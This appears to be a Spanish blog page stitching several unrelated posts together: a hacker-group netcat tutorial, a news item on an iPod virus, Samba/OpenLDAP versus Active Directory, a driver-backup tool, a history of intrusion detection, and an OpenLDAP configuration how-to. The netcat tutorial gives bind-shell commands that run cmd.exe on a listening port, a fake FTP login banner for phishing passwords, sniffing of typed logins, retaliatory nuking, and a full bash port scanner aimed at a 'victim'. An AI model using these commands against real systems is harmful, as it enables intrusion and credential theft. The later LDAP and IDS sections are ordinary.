port numbers can be individual or ranges: m-n [inclusive]

Bien; un analisis rápido de estas variables nos da una idea del potencial de este pequeño programa y las infinitas posibilidades que nos ofrece el poder manejar conexiones de una manera tan básica y sencilla:

<—— Opciones de Netcat ———>

-d (Modo Stealth o encubierto)
Esta opción desvincula al Programa de la consola, haciendolo trabajar en el BackGround.

-e (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto en WinX como en *NIX.

-l (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión

-L (lo mismo que anteriormente pero sigue escuchando aún cuando la conexión es cerrada)
Esta opción es incluida en la versión de Weld Pond de L0pth, y es muy util para seguir escuchando en el puerto, a diferencia de -l (que la conexión cerrada termina con el proceso de nc) esta opción -L permite seguir escuchando en el mismo puerto (la rutina de nc -l es
reiniciada).

-n (Dirección numerica especifica; no hace un DNS Lookup) Netcat tiene la facultad de resolver nombres de dominio mediante un DNS Lookup, con esta opción le especificamos que no lo haga, y use solamente direcciones IP.

-o (obtiene un archivo log en Hex de la acción) Genera un Log de las actividades de netcat en código Hexadecimal.

-p (Puerto para pegarse) Algunas veces debes especificarle con esta opción el puerto a realizar una acción.

-s (pegarse a un IP especifico) Netcat puede utilizar IP de una red como fuente local.

-t (Funciona como un pequeño demonio telnet) Con esta opción le especificas a netcat que debe realizar negociaciones telnet.

-u specify UDP (Utilizar Protocolo UDP) Con esta opción le dices a netcat que trabaje con protocolo UDP en vez de TCP.

-v (modo verbose, mas información, se le puede añadir otra -v para mas info todavia) Bastante util y necesario, sobre todo para estudiar demonios en profundidad y observar todos los detalles en un Sniffing.

-w (Especifica un tiempo para terminar) Con esta opción le especificas un
tiempo determinado para realizar conexiones.

-r (Genera un Patron Ramdom de puertos locales o remotos) Muy util para evitar patrones lógicos de Scanning.

-g (especificar Gateways) Una de las opciones más interesantes de netcat, permite utilizar Routers como “puentes” de conexión.

-G (Especificar puntos de Routing), Con esta opción podemos crear una cadena aleatoria de hosts para crear un ruta perdida para tus paquetes (Spoofing).

-i Especifica un intervalo de segundos entre puertos Scaneados.

<————- Fin de las opciones comentadas ——>

Netcat en Linux
===============

Netcat en una plataforma como Linux se convierte en una utilidad muy potente, pudiendo ser utilizado en conjunto con lenguajes de programación como Perl y C , o bien desde la propia Linea de comandos del poderoso Shell de Linux mediante Shell Scripts.

Cabe destacar que distribuciones como RedHat Linux trae junto con sus paquetes de instalación una versión limitada de netcat; lo mas recomendable es bajar de la red la versión full de netcat para Linux (Importante: La versión de netcat para linux viene a prueba de lamers, por lo cual debemos compilar a netcat con unos flags especiales para poder obtener las opciones.

-t y -e (Telnet y Gaping Security Hole) ). Bajas el .tar de netcat y lo desempaquetas en el directorio de tu preferencia, te ubicas dentro del directorio de netcat y lo compilas con Make utilizando las siguientes Flags:

[root@DarkStar] #make linux DFLAGS=” -DTELNET -DGAPING_SECURITY_HOLE”

Copias el binario (nc) al directorio /usr/bin , de esta manera podras usar netcat directamente llamandolo de cualquier parte del Shell, ademas de que podrás usar los scripts que hagas (o consigas en la red) sin problemas; netcat trae unos scripts muy interesantes y bien comentados para que los estudies y comprendas mejor su implementación en scripts, los scripts están en el
directorio donde desempaquetastes netcat en /scripts , los corres como siempre: ./probe (o el script que quieras).

Utilizando Netcat.
==================

Para ilustrar mejor como trabajamos con este programa, lo mejor es observar ejemplos prácticos y analizar su estructura para poder comprender mejor como funciona y así poder crear nuestras propias aplicaciones.

Algunas de las cosas que podemos hacer con NetCat son:

Obtener un Shell rapidamente en una máquina remota usando la opción -l (Listen) conjuntamente con la opción -e (ejecutar) , cuando el proggie corre con estas variables y la conexión es realizada, NetCat ejecuta el programa elegido y se conecta a stdin y stdout del programa en la conexión a la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Este comando dejará a NetCat escuchando el Puerto 23 (telnet), cuando es conectado a travéz del cliente, ejecutará un Shell (cmd.exe) la opción -t le dice a NetCat que maneje cualquier negociación que el cliente pueda esperar….

Si esta conexión es realizada desde una máquina NT, el shell correrá los permisos del proceso que han generado a NetCat (Hmmm…) así que hay que ser muy cuidadosos

La belleza de NetCat es que puede hacer lo mismo en CUALQUIER puerto Puedes dejar a NetCat escuchando en los puertos NETBIOS, que están probablemente corriendo en la mayoría de las máquinas NT, de esta manera puedes lograr una conexión a una máquina que esté utilizando “Filtrado de Puertos” activado en TCP/IP security Network Control Panel, NT no parece tener ninguna seguridad alrededor de cuales puertos los programas de usuarios son permitidos amarrar, esto quiere decir en pocas palabras, ejecutar comandos y programas que puedan unirse a los Puertos NETBIOS.

Como anteriormente se mencionó, puedes utilizar a Netcat para estudiar diferentes puertos, con la siguiente sintaxis:

c:\>nc -v (puedes añadir otra -v)

Uno de los puertos mas interesantes a la Hora de Analizar un Host, es el puerto 79 (Finger) , puedes obtener nombres de usuarios e información muy util a la hora de planear un “Brute-Force Attack”, este comandito de Netcat te muestra la Flexibilidad del Proggie en cuestion, dandote una idea de sus posibilidades:

c:\>nc -v 79 <> log.txt

El comando anterior le dice a netcat que se conecte en modo verbose al Host predeterminado en el puerto 79 (Finger) y envie el contenido del archivo user.txt (OJO: no he probado esto con una posible lista de nombre de usuarios al azahar), la respuesta del servicio será guardada en el archivo log.txt

Scanner:
========

Netcat puede ser utilizado como scanner, sus multiples opciones le permiten realizar un gran número de combinaciones, pudiendo realizar Scannings en Puertos Random, en puertos conocidos, en modo ascendente o descendente, con intervalos de tiempo, utilizando gateways para evitar mostrar la IP fuente del Scanning, etc.

C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

Pues si; aqui tienen un pequeño y primitivo scanner, se le pueden añadir puertos escogidos como en el ejemplo anterior o asignarle un rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch:
localhost != darkstar localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc…

Volvemos con la opción -v (verbose) y la Opción -z (zero i/o) que es usada para scanning, los puertos se lo especificamos al final del IP del host, bien sea individuales separados por un espacio; o por un rango de puertos.

Sniffer:
========

Otra de las interesante posibilidades de netcat es su capacidad para escuchar conexiones en cualquier puerto, pudiendo redireccionar todo el tráfico del mismo hacia un archivo o hacia pantalla, en este sencillo ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 …
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui… Muuuaaahahahahahah!!! B-]

Tambien podemos redireccionar toda la salida a un archivo e irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 …

[Aqui viene la conneción...]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la connección se va al archivo login.txt]
sent 0, rcvd 42

[La opción -L permite que netcat escuche nuevamente al terminar la conexión,
"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 …

El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
———————

Ejecutamos a Netcat con la opción o variable -v (verbose) (doblemente “verbose” por si acaso) esto hará que el resultado de netcat, sea mostrado directamente en pantalla (a diferencia del archivo usado por Dr._X) , la opción o variable -L (Listen, and listen again) nos permitirá dejar escuchando u “oliendo” en determinado puerto aun cuando la conexión sea interrumpida (listen again), con la variable -p le indicamos el puerto…

Al ejecutar a netcat con esa combinación de variables las opción -v me indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 …

Realizo desde otra ventana un telnet a localhost (127.0.0.1) en el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado

Voilá! un Sniffer en LocalHost! Jajaja!!!

Detector de Conneciones Sospechosas:
====================================

La posibilidad de dejar a netcat escuchando en determinados puertos, nos permite crear una especie de “trampa” para un supuesto agresor que utilize scanners, o herramientas tales como NetBus o BackOrifice en contra de nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood y redireccionar su salida hacia la estación agresora en caso de una conexión no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas más, Muaahahaha!)

Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo real de un dia como cualquier otro en IRC; he aquí el ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 …

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
31338

Back Orifice utiliza el protocolo UDP para realizar sus travesuras, realiza la conexión desde un puerto aleatorio (casi siempre el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una variante de BO), por eso se utiliza la opción -u (protocolo udp) , netcat se queda esperando conexiones UDP en el puerto 31337 (default de BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a pantalla el IP y el DNS del agresor…

Luego un pequeño “Ping of Death” (Nuke) para el transgresor y le hacen un Scan para ver cuando desaparece B-]
nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<–Chao!!! Jeje!! Otros usos Miscelaneos: ======================= Puedes utilizar algo de ingienería social para capturar algunos passwords con netcat, por ejemplo, si una máquina no tiene abierto el puerto de FTP o de telnet, creas un archivo de texto que solicite el ID y el Password de la víctima; algo así: Microsoft Internet FTP Server V.5.9 [Beta] 04/16/99 myhost.com Please introduce Username, password and press “Enter” LogOn: Luego redireccionas el archivo hacia la victima: C:\nc11nt>nc -v -v -L -p 21 nombre del host -t <> nc -v nombre del host 23(o el puerto de tu preferencia)

Netcat y Programación:
======================

Esta combinación desencadena todo el Poder de Netcat en su máxima expresión; Tratandose de una herramienta que funciona con lineas de comandos, su integración con un lenguaje de programación le permite realizar gran cantidad de tareas, y posibilidades se van descubriendo dia a dia con su inclusión en nuevos Scripts y Exploits.

Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten frustrados porque muchos de los Scripts y Exploits que bajan de la Red simplemente no les funciona, porque no saben interpretar el Código y por lo tanto son incapaces de efectuar las modificaciones necesarias para incluir librerias, paths o utilidades necesarias para su funcionamiento. (Jódanse ScriptKiddies!!! Jajaja!!)

Netcat es exelente para implementar exploits remotos, permitiendo enviar el código a cualquier puerto vulnerable con una simple orden, logrando ejecutar todos los comandos necesarios para explotar determinados servicios.

Varios exploits que circulan actualmente en la Red, usan a netcat como “motor” para manejar las conexiones, si analizamos el código de estos programas podemos observar un nc por ahí, esto significa que el Proggie en cuestión necesita una versión correctamente compilada de netcat en el
directorio /usr/bin . A continuación un pequeño programa realizado por el Doctor_X de Hven utilizando a netcat:

<———- Hven Port Scanner!! ——>

# !/bin/bash
# Scanner de Puertos
# By DoctorX 17/04/99 email: d0ct0r_x@bactery.8m.com
# Zona de Bacterias http://bactery.8m.com
# Hackers de Venezuela http://www.hackhour.com.br/hven
# Este es un shell script hecho por mi para la verificacion de
# conexiones a un host utilizando netcat.

# Declaracion de Variables

export NETCAT=” nc -v -v -w 8 -z “
export RANGO=$2
LOCALHOST=$(uname -n)
export PUERTOS=”21 23 25 79 80 110 111 113 139 143 513 514 515 6000 31337″
export MEM1=”Scanner de Puertos “
export MEM2=”by “
export MEM22=”para Hackers Venezuela”
export MEM3=”Victima : “
export MEM4=”Falta el GateWay para el Source Routing !!!!!!”
export MEM5=”Te van a pillar !!!!!!! $USER jejejejeje “
export MEM6=”Local Host : $LOCALHOST “
export MEM7=”UDP Scan “
export MEM8=”http://www.hackhour.com.br/hven“
export re=”[5m"
export cl="[0m"
export rojo="[31m"
export email="email:d0ct0r_x@bactery.8m.com"

# Declaracion de Funciones

# Mensaje cuando no se le dan Parametros

function mem() {
local uso="uso :$0 [opcion] “
local DRX=”DoctorX”
echo $MEM1
echo $MEM2 ${rojo}$DRX${cl} $MEM22
echo $MEM8
echo ${rojo}$uso${cl}
echo ” :IP/HOSTNAME de La Victima jejejeje “
echo ” :source-routing , es opcional “
echo “opciones : “
echo “u :esta opcion de utiliza para hacer scan udp”
echo “so eterminacion de SO de servidores Web”
echo “r rango_de_puertos :Cambia el rango de puertos por defecto :plow-phi” &&
exit ; }

# Mensaje Inicial

function mem2() {
VICTIMA=$1
echo $MEM1
echo $MEM2 ${rojo}DoctorX${cl} $MEM22
echo $MEM3 $VICTIMA
echo $MEM6 ; }

# Mensaje 2

function mem_web() {
mem_web1=”Hackers Venezuela”
mem_web2=”By”
mem_web3=”Victima : “
VICTIMA=$1
mem_web4=”Determinacion de SO en Web Servers”
echo $mem_web1
echo $mem_web4
echo $mem_web2 ${rojo}DoctorX${cl} $email
echo $mem_web3 $VICTIMA ;}

# Scan Tcp

function tcp() {
HOST=$1
$NETCAT $HOST $PUERTOS ; }

# Scan Tcp con Rango

function tcp_rango() {
HOST=$2
RANGO=$1
$NETCAT $HOST $RANGO ; }

# Scan UDP

function udp() {
VICTIMA=$1
echo $MEM7
$NETCAT -u $VICTIMA $PUERTOS ; }

# Scan UDP con gateway

function udp_gateway() {
echo $MEM7
VICTIMA=$2
GATE=$1
NETCAT_GATE=”nc -v -v -z -u $VICTIMA -g $GATE “
$NETCAT_GATE $PUERTOS ; }

# Scan con Source Routing

function tcp_gateway() {
GATE=$1
HOST=$2
RANGO=$PUERTOS
echo “Gate : $GATE “
$NETCAT -g $GATE $HOST $RANGO ; }

# Advertencia

function adv() {
local MEM4=”Falta el GateWay para el Source Routing !!!!!!”
local MEM5=”Te van a pillar !!!!!!! $USER jejejejeje “
echo ${rojo}$MEM4${cl}
echo ${re}${rojo}$MEM5${cl} ; }

# Determinacion de SO

function web_so() {
NC=”nc -w “
HTTPPORT=”80″
GET=”GET /”
ECHO=”/bin/echo”
HEAD=”HEAD / HTPP/1.0″
HTTPVARIABLE=”Server:”
WEB_SERVER=”$1″
LOG=”salida.txt”
#CHECKHTTP=( echo $GET ; sleep 5)| $NETCAT $VICTIMA 80
( echo $HEAD ; echo ; echo ) | $NC 8 $WEB_SERVER $HTTPPORT | grep $HTTPVARIABLE | cut -d: -f2 1> $LOG
cat $LOG
rm -f $LOG ;}

# Seleccion de Opcion

case $# in 0 ) mem ;;
1 ) mem2 $1 ;
adv ;
tcp $1 ;;
3 ) if [ "$1" != "r" ]; then
mem2 $2
udp_gateway $3 $2
else { mem2 $3
adv
tcp_rango $2 $3 ;}
fi ;;
2 ) if [ "$1" != "u" ] ; then
if [ "$1" != "so" ] ; then
{ mem2 $1
# adv
tcp_gateway $2 $1 ;}
else { mem_web $2
web_so $2 ;}
fi
else { export HOST=$2
mem2 $HOST
udp $2
exit 0 ;}
fi ;
esac

<——- Fin del Hven-Scanner, cortar aquí ———>

Conclusión:
============

Si estudiamos detalladamente las variables, el misterio de netcat desaparece, viene la parte de la imaginación; ¿Que otras funciones le podemos asignar? ¿Que mas podría hacer? ; al revisar el
programa que envió Dr._X me dije: “Lógico! Hmmm… Y que tal si hacemos asi…” ; el hacking no es más que probar nuevas posibilidades, utilizando el ingenio, los conocimientos acumulados y una dosis bastante fuerte de imaginación podremos lograr loque queramos.

Si tienes otras ideas, utilidades, programas o forma innovadora para utilizar netcat, escribenos un mail, estaré encantado de anexarlo en este documento….

Este Documento fue Realizado por Kliber, Agradecimientos especiales a Doctor_X (Code Freak) , DarkDeath, y a todos los miembros de nuestra comunidad por su invaluable Colaboración.

“Hecho en Venezuela!”

==============================
kliber@hven.com.ve
Hackers Venezuela
“El Conicimiento es Poder!!”
http://hven.com.ve
==============================

Fuente Externa: foro.elhacker.net/

Se trata del primer virus que puede vulnerar la seguridad de los pequeños dispositivos reproductores de música y de películas. En principio no llegaría a dañarlos

La encargada de dar a conocer la mala noticia fue la empresa especializada en la lucha contra los ‘gusanos’ informáticos Kaspersky Lab, quien advirtió que el virus, que debe ser iniciado por el usuario (no
se ejecuta automáticamente), funciona si en el iPod está instalado el sistema operativo Linux.

Según la empresa se trataría de un virus que ‘no tiene ninguna función peligrosa y no representa riesgo para los usuarios, sin embargo muestra que es posible escribir programas nocivos para estos dispositivos en el futuro’.

Después de iniciado, el virus contagia los ficheros del dispositivo con la extensión ‘.elf’. Al ejecutar los ficheros infectados, el virus muestra en la pantalla ‘You are infected with Oslo the first iPodLinux Virus’ (Estás infectado por Oslo, el primer virus para iPodLinux).

Fuente: http://www.infobae.com/

La incorporación del Directorio Activo de Microsoft, como solución comercial del servidor de Directorio es hoy muy difundido en las organizaciones, sobre todo porque proporciona herramientas gráficas de administración y configuración del directorio muy fáciles de utilizar; pretendiendo aislar al administrador de la red, de los conocimientos avanzados acerca de los protocolos y estándares que implementa.

La sustitución del Active Directory por Samba-OpenLdap ofrece numerosas ventajas, no sólo por ser este un software amparado por licencias de libre distribución, sino por ser un sistema altamente configurable, que permite personalizar una organización en la medida exacta a través deldirectorio.

Active Directory
Active Directory es una implementación propietaria (creada por Microsoft) de los Servicios de Directorio, y proporciona una manera de compartir información entre recursos y usuarios de la red. Además de proporcionar una fuente centralizada para esa información, Active Directory también funciona como autoridad de seguridad centralizada de autenticación para la red.
Active Directory combina capacidades que tradicionalmente se hallaban en sistemas separados y especializados de directorio, como integración simplificada, gestión y seguridad de los recursos de la red. El paquete SAMBA puede configurarse para usar los servicios de Active Directory desde un controlador de dominio de Windows.

LDAP
(“Lightweight Directory Acces Protocol”, en español Protocolo Ligero de Acceso a Directorios) es un protocolo de tipo cliente-servidor para acceder a un servicio de directorio. Se usó inicialmente como un Front-End o interfaz final, también puede usarse con servidores de directorio únicos y con otros tipos de servidores de directorio. ¿Qué es un directorio? Un directorio es una base de datos, pero en general contiene información más descriptiva y más basada en atributos de usuarios y recursos de red.

LDAP (OpenLDAP)
La aplicación de servidor LDAP proporciona funcionalidad de Servicios de Directorio a ordenadores Windows de una forma muy similar a los servicios de Microsoft Active Directory. Tales servicios incluyen gestionar las identidades y las relaciones entre los ordenadores, usuarios y grupos de ordenadores o usuarios que participan en la red, y proporcionan una forma consistente de describir, localizar y gestionar esos recursos. La implementación de libre distribución disponible en su sistema de libre se llama OpenLDAP. Los demonios de servidor responsables de gestionar las peticiones de directorio OpenLDAP, y la propagación de datos de directorio entre un servidor LDAP y otro Linux, son slapd y slurpd.
OpenLDAP puede usarse junto con SAMBA para proporcionar servicios de Archivo, Impresión y Directorio prácticamente de la misma forma que un Controlador de Dominio de Windows, si se compila SAMBA con soporte LDAP.
OpenLDAP no tiene nada que envidiarle al Microsoft Active Directory, las herramientas están ahí, sólo hay que saberlas implementar y administrar, lo que sería su único costo (tiempo y paciencia).

Integración de redes con OpenLDAP+Samba+cups:
Con esta herramienta usted puede integrar sus usuarios finales, usuarios comunes con su computador Windows XP, si el caso lo amerita, esto sin hacer cambios que puedan entorpecer las labores de estos usuarios, en caso de que usted quiera hacer alguna prueba en alguna empresa o casa de estudios.
Active Directory y OpenLDAP son en esencia, lo mismo (utilizan el mismo protocolo “LDAP”, son de la misma gama de servidores de directorio “X500″, trabajan con el mismo tipo de bases de datos “BDB”, entre otras muchas similitudes…), hay una cosa que los malos administradores no saben, y es que unservidor de directorio (LDAP) no es solamente para guardar la información relativa al login de un usuario, sino que también sirve para almacenar libretas de contactos, calendarios compartidos, Información personal mas allá de simplemente usr y pass, en resumen… sirve para mucho más…. además, es el aliado #1 de un buen administrador de red.

Dos de las preguntas más frecuentes, de aquellos que quieren intentar este cambio de plataforma son:
1: ¿Qué pasa con el Controlador de Dominio (DC) que poseo actualmente?
2: ¿Qué hago con mis usuarios finales, que poseen Windows XP o Vista?
Existe la manera para hacer una migración completa de todos los usuarios y contraseñas, entre otros servicios propios de un Controlador Principal de Dominio PDC (Primary Domain Controller). Esto es totalmente válido para Controladores de Respaldo de Dominio (Backup Domain Controller, BDC).

Fuente:clavedigital.com

Algo que muchas veces suele dar dolor de cabeza es el volver a reinstalar los drivers una vez hemos formateado y reinstalado nuestro Windows. Para ello existen programas como Driver Max que nos ayudarán a realizar una copia de seguridad de todos nuestros drivers.

Tenemos la opción de elegir que drivers queremos guardar y cuales no. Una vez se haya creado la copia de seguridad podremos formatear y reinstalar nuestro Windows sin ningún problema ya que con DriverMax y un sólo click podremos importar todos los drivers que teníamos anteriormente sin necesidad de estar buscándolos uno por uno.

A este tipo de programas se les puede dar muchos usos, yo lo usaba en mi anterior trabajo cuando entregaban muchos ordenadores de características similares y teníamos que quitarles el Vista y ponerles el XP, undolor de cabeza para encontrar los drivers pero una vez hecho, pasaba DriverMax por todos los ordenadores y a funcionar.

Fuente: http://www.pablogeo.com/driver-max-3-la-solucion-para-el-backup-de-drivers

Historia

Cuando la gente oye hablar de Sistemas de Detección de Intrusiones, generalmente los asocia a “alarmas de ladrones para ordenadores o redes”. Es fácil entender un concepto como este usando comparaciones sencillas. En realidad, la explicación es bastante aproximada, y los usuarios que no se dedican a la seguridad no necesitan saber más. Sin embargo, los expertos en seguridad no pueden cometer el error de conformarse con algo tan trivial, sin tener conocimiento alguno sobre la historia de estos sistemas.

La detección de intrusiones es el fruto de la aplicación del Procesamiento Electrónico de Datos (EDP) a las auditorías de seguridad, utilizando mecanismos de identificación de patrones y métodos estadísticos. Es una parte imprescindible en las modernas tecnologías de seguridad de redes.

Antes de la detección de intrusiones existían las auditorías de seguridad. La auditoría es el proceso de generar, almacenar y revisar eventos de un sistema cronológicamente.

La Figura 1‑1 muestra un esquema simple del funcionamiento de un sistema de auditorías. Los eventos de sistema son capturados por los generadores de auditorías, que llevan los datos al elemento encargado de guardarlos en un fichero de “logs”. El analizador, en base a unas políticas de seguridad, emite los resultados a través de un terminal.

Figura 1‑1 – Sistema de Auditorías Básico

Durante los comienzos de la historia de los ordenadores, estas máquinas eran relativamente escasas y muy caras. Su uso estaba restringido a técnicos e ingenieros especializados. Los primeros sistemas de auditorías tenían como propósito medir el tiempo que dedicaban los operadores a usar los sistemas que monitorizaban, con una precisión de milésimas de segundo, y servían entre otras cosas para poder facturarles el mismo.

Auditorías: el comienzo

A mediados de los años 50 la empresa “Bell Telephone System”, de Estados Unidos, creó un grupo de desarrollo con el objetivo de analizar el uso de los ordenadores en el futuro en el negocio de las empresas de telefonía. Este equipo estableció la necesidad de utilizar auditorías mediante el Procesamiento Electrónico de Datos (EDP), rompiendo con el anterior sistema basado en los tradicionales informes de papel. Esto hizo que a finales de los 50 la “Bell Telephone System” se embarcara en el primer sistema a gran escala de facturación telefónica controlada por ordenadores. [1]

El Departamento de Defensa de EEUU empleó numerosos recursos en los años 70 para la investigación de políticas de seguridad, directrices y pautas de control de lo que denominaban “sistemas de confianza”. Estos esfuerzos culminaron con la Iniciativa de Seguridad de 1977.

Los Sistemas de Confianza son aquellos “sistemas que emplean los suficientes recursos hardware y software para permitir el procesamiento simultáneo de una variedad de información confidencial o clasificada”. [2]

En estos sistemas se albergaban distintos tipos de información repartida en niveles, que correspondían a su grado de confidencialidad.

En un principio, los desarrolladores no tenían claro si las auditorías jugaban un papel importante en la seguridad de un sistema de confianza. Más tarde, se terminó incluyendo un apartado sobre los mecanismos de las auditorías en el “Trusted Computer System Evaluation Criteria” o TSCSEC [3] (Libro Naranja), como un requisito para cualquier sistema de confianza de clase C2 o superior. La serie de documentos del Departamento de Defensa de EEUU sobre Sistemas de Confianza se conoce como la “serie Arco Iris” (“Rainbow series”) debido a los colores de las tapas de los libros que publicaban.

El documento que trata el tema de las auditorías está incluido en el “Libro Marrón” titulado “A Guide to Understanding Audit in Trusted Systems” [4]. En este libro se enumeran los cinco objetivos de un mecanismo de auditoría:

·         Permitir la revisión de patrones de acceso (por parte de un objeto o por parte de un usuario) y el uso de mecanismos de protección del sistema.

·         Permitir el descubrimiento tanto de intentos internos como externos de burlar los mecanismos de protección.

·         Permitir el descubrimiento de la transición de usuario cuando pasa de un menor nivel de privilegios a otro mayor (elevación de privilegios).

·         Permitir el bloqueo de los intentos de los usuarios por saltarse los mecanismos de protección del sistema.

·         Servir además como una garantía frente a los usuarios de que toda la información que se recoja sobre ataques e intrusiones será suficiente para controlar los posibles daños ocasionados en el sistema.

Los primeros Sistemas de Detección de Intrusiones

A medida que el número de ordenadores crecía, el número de eventos de sistema a analizar era tal que esta tarea se volvía humanamente imposible. Las autoridades militares de norteamericanas se dieron cuenta de que el uso cada vez más masivo de ordenadores en sus instalaciones requería algún mecanismo que facilitara la labor de los auditores.

James P. Anderson fue la primera persona capaz de documentar la necesidad de un mecanismo que automatizara la revisión de los eventos de seguridad. Describió el concepto de “Monitor de Referencias” en un estudio encargado por las Fuerzas Aéreas de EEUU, y redactó un informe en 1980 que sería el primero de los futuros trabajos sobre detección de intrusiones. Uno de los objetivos de este informe era la eliminación de información redundante o irrelevante en los registros de sucesos.

Anderson propuso un sistema de clasificación que distinguía entre ataques internos y externos, basado en si los usuarios tenían permiso de acceso o no al ordenador. Estos eran los principales objetivos de los mecanismos de auditoría de seguridad:

Leer más…

En el documento-howto-guía pasado escribí acerca de cómo utilizar OpenLDAP como un servidor de autenticación.
Ahora voy a escribir en cómo configurar OpenLDAP para:

1. Configurar el cliente de OpenLDAP para que al momento que el usuario se logee, el cliente genere un directorio /home/$usuario
2. Configurar OpenLDAP para permitirle al usuario modificar su contraseña
3. Configurar OpenLDAP para que un usuario solo tenga acceso a hosts/clientes específicos, en ves de tener acceso a todos los hosts que utilizan OpenLDAP como servidode autenticación

1. Configurar el cliente de OpenLDAP para que al momento que el usuario se logee , el cliente genere un directorio /home/$usuario

Cuando un usuario establece una conexión a un sistema que utiliza OpenLDAP como servidor de autenticación, el usuario NO tendrá un directorio /home/$usuario puesto que la cuenta de usuario no fue creada localmente en el sistema.

Al logearme al sistema me aparece esto:

[dan@centos ~]$ ssh usuarioTest@host_usando_openldap_como_auth_server
usuarioTest@centos’s password:
Last login: Thu Jul 31 11:19:17 2008 from otro.host.de_mi_red.com
Could not chdir to home directory /home/usuarioTest: No such file or directory
-bash-3.1$

Esto es porque el usuario no tiene un directorio en /home en este host, la manera de solucionar esto es

* Creándo el /home/usuarioTest a mano
o
* Modificando /etc/pam.d/sshd y agregándo al final una línea como esta:

session required pam_mkhomedir.so skel=/etc/skel/ umask=0022

Trata de logearte de nuevo al sistema, y verás algo cómo esto:

[dan@centos ~]$ ssh usuarioTest@host_usando_openldap_como_auth_server
usuarioTest@centos’s password:
Creating directory ‘/home/usuarioTest’.
Last login: Fri Aug 8 08:38:26 2008 from otro.host.de_mi_red.com
[usuarioTest@centos ~]$

Listo! Ahora configura tus demás hosts para que utilicen OpenLDAP como su servidor de autenticación.

2. Configurar OpenLDAP para permitirle al usuario modificar su contraseña

Esta es una modificación sencilla en la configuración de OpenLDAP, lo único que tienes que hacer es agregar las siguientes líneas a /etc/opendalp/slapd.conf

– snip –
access to attrs=userPassword
by self write
by anonymous auth
by dn.base=”cn=admin,dc=mi_dominio,dc=com” write
by * none

access to *
by self write
by dn.base=”cn=admin,dc=mi_dominio,dc=com” write
by * read
– snip –

Reinicia el servicio de OpenLDAP con un /etc/init.d/ldap restart
Disfruta de los resultados.

3. Configurar OpenLDAP para que un usuario solo tenga acceso a hosts/clientes específicos, en ves de tener acceso a todos los hosts que utilizan OpenLDAP como servidode autenticación

El primer paso a realizar es generar una Organizational Unit (ou) con el nombre de “Hosts”, aquí un ejemplo del ldif:

– snip –
dn: ou=Hosts, dc=mi_dominio,dc=com
ou: Hosts
objectClass: top
objectClass: organizationalUnit
– snip –

Después lo que se tiene que hacer es poblar esta OU co el nombre de cada host, debemos de crear una entrada por cada host que tengamos en nuestra red, aquí un ldif de ejemplo:

– snip –
dn: cn=nombre_del_host, ou=Hosts, dc=mi_dominio,dc=com
ipHostNumber: 2.2.2.2 (aquí la la ip sl host)
objectClass: ipHost
objectClass: device
objectClass: extensibleObject
cn: nombre_del_host.mi_dominio.com (este es el FQDN del host)
cn: clb1
– snip –

El siguiente paso es modificar /etc/ldap.conf en cada host de nuestra red, debe de modificarse de la siguiente manera:

– snip original –
# Group to enforce membership of
#pam_groupdn cn=PAM,ou=Groups,dc=example,dc=com

# Group member attribute
#pam_member_attribute uniquemember
– snip original –

– snip modificado –
# Group to enforce membership of
pam_groupdn cn=nombre_del_host,ou=Hosts,dc=mi_dominio,dc=com

# Group member attribute
pam_member_attribute member
– snip modificado –

Después de hacer esto, viene la “magia”. Hay que agregar un atributo al cn=nobre_del_host con el id del usuario que queremos permitirle acceso a este host, el ldif queda de la siguiente manera:

– snip –
dn: cn=nombre_del_host, ou=Hosts, dc=mi_dominio,dc=com
ipHostNumber: 2.2.2.2
objectClass: ipHost
objectClass: device
objectClass: extensibleObject
cn: nombre_del_host.mi_dominio.com (este es el FQDN del host)
cn: clb1
member: uid=kwame,ou=People,dc=mi_dominio,dc=com
